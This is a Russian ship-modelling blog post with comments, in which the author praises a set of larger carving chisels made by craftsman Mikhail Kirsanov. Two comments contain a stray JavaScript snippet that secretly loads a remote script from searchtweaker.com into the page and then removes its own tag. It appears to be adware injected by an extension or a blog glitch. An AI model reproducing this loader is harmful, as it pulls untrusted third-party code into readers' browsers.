7 909 962-27-56

+7 495 120-75-76

8 800 500-54-29

пн-сб с 10 до 18, время московское

Сказ про мозг, штихеля и эмбрион.(часть1)

Сказ про мозг, штихеля и эмбрион.(часть1)


 
Это очередной очерк под тегом «резьба». Рассажу еще об одной своей работе. Этот рассказ я сделаю двухярусным, ибо рассказать хочется о разном. Попробую разграничить повествование на небольшие составляющие, чтобы было и писать и воспринимать легче. И начну я с истории, которая началась до самой работы. Задолго до…
[spoiler]
Это было тогда, когда я стал счастливым обладателем  суперского набора резцов от Михаила Кирсанова.





Если вы не в курсе, о чем это я, то прервитесь и сбегайте по ссылке, которую увидите чуть ниже. Букв там много, но, поверьте, они интересные. Особенно, если вам не чужда тема резьбы в частности, и вопрос хорошего инструмента в целом. А таковой момент в судомоделизме- это три седьмых хорошего результата. Как минимум. А теперь и ссылка:
http://www.shipmodeling.ru/blogs/Blog-Korablika/2808.php

Те же, кто и так в курсе о чем речь, то давайте подождем тех, кто пошел-таки по ссылке... Так, пожалуй, достаточно. Если кто не успел вернуться, то догонят. Поехали дальше.

Так вот, когда шел процесс переговоров и заказа инструмента я спрашивал Михаила, сможет ли он изготовить резцы более массивные, классические, привычные. Потому как даже в миниатюрной резьбе без «взрослых» резаков не обойтись. Ведь перед тем, как начать снимать нано стружку нужно сделать черновую зарубку и создать основу фигурки, то, что в дальнейшим и доработается до итогового состояния. А делать это микроскопическим и тонким инструментом все равно, что пинцетом класть фундаментные блоки.  Ну да вы и так все понимаете.





Но Михаил, к моему сожалению, ответил отказом. Написал, что не обладает заготовками нужных размеров. Жаль, что тут скажешь. Хотя резцы более привычных размеров и радиусов найти совсем не такая уж и проблема, не то что макро резаки, которые вообще в природе нигде и не встретишь, но мне было на самом деле жаль, что не удалось заказать подобное у Михаила. Не знаю, как точно объяснить причину этого сожаления, те кто знаком с его инструментом поймут о чем я. То, что я получил от Михаила идеальнейшего качества: прямые стамески с идеальными углами и гранями, полукруглыми- хоть радиусы в циркулях перепроверять. И это все в таких микроскопических размерах, что можно только удивляться. Поэтому я и хотел иметь резаки покрупнее именно руки этого мастера.
Не хочу сказать, что магазинными стамесками невозможно работать. Любым инструментом можно сделать и шедевры. И купить тоже можно разного уровня: и попроще- какие-нибудь китайские с неправильной формой, и довольно неплохие по качеству. Но и стоить такие будут соответственно, особенно брендовые изделия.




После ответа Михаила этот вопрос на долгое время отошел на тридесятый план. У меня был хоть какой-то инструмент, которым я и работал, особой острой необходимости не было, да и очень долгое время я вообще не занимался ничем творческим. Как говорится не свистнул еще рак на горе!



И вот совсем недавно я вдруг получаю от Михаила странное письмо:
«Эх, Саша, Саша. Почто обижаешь? Посылку не забираешь? Негоже так.»
Если не точная цитата, то смысл был таков. Я же понятия не имел о чем же речь-то. Тут сделаю небольшое отступление, объясню немного. Дело в том, что несколько месяцев назад в нашем поселке уволилась почтальонша, и нового человека так и не нашли. С тем, что с недавних пор местное отделение почты работает в неполноценном варианте. Пару раз в неделю в поселок приезжает машина из города и тогда почту на некоторое время открывают. В такие периоды там собираются люди: кто за пенсиями, кто за квитанциями и другими делами. Одним словом, народу в такие дни много. Ну и, соответственно, нет и разговоров о том, чтобы разносили извещения, почту и прочее. Поэтому я и не получал никаких известий о том, что мне что-то пришло. Хорошо, что Михаил написал, так может полежала бы посылка, да и обратно уехала, или вообще прижилась где-то.
И вот я приношу домой коробочку, раскрываю, и вау! Передо мной футлярчик. А внутри… Короче смотрите сами!









Как впоследствии выяснилось, Михаил нашел нужные заготовки, годные для изготовления хороших резаков любых размеров. Размеры, количество, конфигурация металла и ручек может быть разная. По опыту я могу сказать, что чем больше и разнообразнее позиции в наборе, тем лучше. Например, своим микро набором я пользуюсь всем абсолютно. Нет таких резаков, которые  были бы не у дел. Уже писал в прошлом инструментальном топике, что не смог бы найти такие, которые смог бы с чистым сердцем выкинуть или продать за ненадобностью. Это как с клавишами на рояле: все из них нужны, нет лишних или запасных. Конечно, есть основные и чаще используемые, есть более специфичные, но важны все. Поэтому и сейчас я абсолютно уверен, что со временем расширю и этот набор, чтобы были все возможные позиции. И совсем узкие, и широкие. Все пригодятся.





И так сложились обстоятельства, что совсем скоро у меня получилось испробовать их в деле. Для такой пробы мало просто повертеть штихеля в руках, пощупать. Даже постругать какую-нибудь палочку мало для правильного представления. Так можно разве что увидеть острый ли край и не болтается ли лезвие в ручке, не криво ли сидит? Чтобы понять удобен ли инструмент нужна реальная работа. Когда не все равно где в древесине  остановилось лезвие, не приходится ли приноравливаться к резакам, как именно сидит в руке.


Например, до этого я понял, что важна длина лезвия и форма ручек. Так мне удобно держать инструмент поближе к лезвию, а это означает, что при слишком длинной металлической ножке я держусь не за ручку, а за металл. Ручка же мотыляется где-то сзади. Но и короткое лезвие чревато проблемами. При заточке «рано начинающаяся»  ручка не даст положить инструмент под нужным углом. Ну и сама ручка. Были такие резцы, что не нравились либо слишком толстой формой, либо тонкой. Так вот новый набор меня порадовал, всегда мечтал попробовать грушевидные рукоятки. Они не подвели мои ожидания, удобные, особенно, учитывая, что этот набор именно для более силовой резьбы. Можно и пальцами манипулировать, и ладонью.  Про точность и идеальную заточку и упоминать излишне- исполнение на высочайшем уровне.
На сколько я знаю, автор еще не сильно афишировал свои новинки, но уверен, что он не обидится, за что я поведал о его штихелях. По словам Михаила сейчас у него достаточный запас материала, но жизнь такая сложная, кто там знает, что окажется за углом. Глядишь, сегодня есть возможность, а завтра кто его знает что будет. Так что я еще раз продублирую его координаты:

mihail.kirsanov@mail.ru


Инструмент действительно очень хорош, утверждаю это со стопроцентной уверенностью в своих словах, не боясь, что вдруг придется краснеть перед кем-то, кто сможет обвинить в голословности. Так что думайте сами. Специально не пишу ни о цене, ни о точных размерениях- это уже прерогатива автора. Связывайтесь, общайтесь, заказывайте, творите!





Ну вот, про штихеля я поведал. Осталось про мозг и эмбрион рассказать. На этом эту часть я завершу и продолжу рассказ уже в следующей части.

Продолжение континует...;)

Мне нравится0
10.01.2015 14:30:36
Затравка как и всегда отличная, жду основное блюдо!
Ссылка Мне нравится0
Мне нравится0
10.01.2015 19:07:41
Затравка как и всегда отличная, жду основное блюдо!

Спасибо, Жень.
Постараюсь и 2 частью тебя не разочаровать
Родитель Ссылка Мне нравится0
Мне нравится0
10.01.2015 14:56:28
 Саш, отдельно спасибо скажи Александру Евгеньевичу Зайцеву, который и поделился железом для резцов.
Для тех кто не знает, Зайцев, один из метров судомоделизма в Москве и просто хороший, гостеприимный человек.  
Ссылка Мне нравится0
Мне нравится0
10.01.2015 19:05:03
Про Александра Евгениевича я наслышан. спасибо, кстати, что написал его отчество. Мало ли, вдруг жизнь повернется этак, что доведется встретиться лично, а я смогу по всей форме обратиться. И мне удобнее и ему приятнее. Ляпота.
Миш, передавай ему, пожалуйста, привет и низкий поклон, у него действительно в этой истории не последнее место, я не стал писать о источнике материала, не знал насколько это будет уместно.

П.С. Тортик- дивный, рад за вас. Говорят материки движутся, мож когда-то Белгород подплывет к Первористольной поближе и я смогу тоже у себя вас всех принять. Надеюсь на это.
Родитель Ссылка Мне нравится0
Мне нравится0
10.01.2015 15:36:30
Спасибо Александр на добром слове.

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Ссылка Мне нравится0
Мне нравится0
10.01.2015 19:06:33
Спасибо Александр на добром слове.
Это вам спасибо!!! Низкий поклон за все!!!!
function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Сильно сказано! Не поспоришь!!!:D
Родитель Ссылка Мне нравится0
Мне нравится0
11.01.2015 18:21:42
Это глюк движка блогов, сам такое пару раз ловил :D
Родитель Ссылка Мне нравится0
Мне нравится0
10.01.2015 16:29:08
Молодец Саша за хороший и добрый рассказ.
И спасибо Михаилу, что делает такие замечательные вещи :)
Ссылка Мне нравится0
Мне нравится0
10.01.2015 19:08:15
Спасибо, Максим.
Родитель Ссылка Мне нравится0
Мне нравится0
10.01.2015 21:14:18
КРасивые у вас работы,поучиться надо такому .
Ссылка Мне нравится0
Мне нравится0
11.01.2015 17:31:13
Спасибо, Дмитрий. Мы все друг у друга учимся. В этом и весь смысл форумов.
Родитель Ссылка Мне нравится0
Мне нравится0
UHU
11.01.2015 21:20:55
Мастеру и инструмент соответствующий, поздравляю! :)
Ссылка Мне нравится0
Мне нравится0
11.01.2015 22:02:52
Спасибо! Такая весч не залежится на полочке.
Родитель Ссылка Мне нравится0